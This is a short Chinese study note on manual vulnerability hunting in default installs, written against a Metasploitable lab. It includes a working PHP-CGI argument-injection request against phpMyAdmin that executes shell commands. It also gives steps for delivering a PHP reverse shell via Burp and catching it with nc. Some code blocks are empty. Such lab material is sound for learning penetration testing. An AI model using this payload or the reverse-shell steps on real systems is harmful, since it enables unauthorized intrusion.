手动漏洞挖掘-默认安装
Windows默认安装漏洞
phpMyAdmin/setup
- MetaSploitable
1
2
3
4
5
6
7
8POST http:///phpMyAdmin/?-d+allow_url_include%3d1+-d+auto_prepend_file%3dphp://input HTTP/1.1
Host: 192.168.20.10
Content-Length: 40
<?php
passthru('pwd&&ls');
die();
?>
- 写入webshell
- MetaSploitable
1 |
|
PHP反弹shell
/usr/share/webshells/php/php-reverse-shell.php
- 直接把内容用burp发送,然后在本地用nc侦听,记得修改php文件里面的ip地址
侦听shell
1 |
|
File
- 如果当前用户没有权限执行ifconfig,先用whereis 查看ifconfig的路径,然后到目录下使用./执行。
Ubuntu/Debian默认安装PHP5-cgi
可直接访问/cgi-bin/php5和/cgi-bin/php(爬不出来的目录
总结
思路:先检查默认安装的软件是否有相关漏洞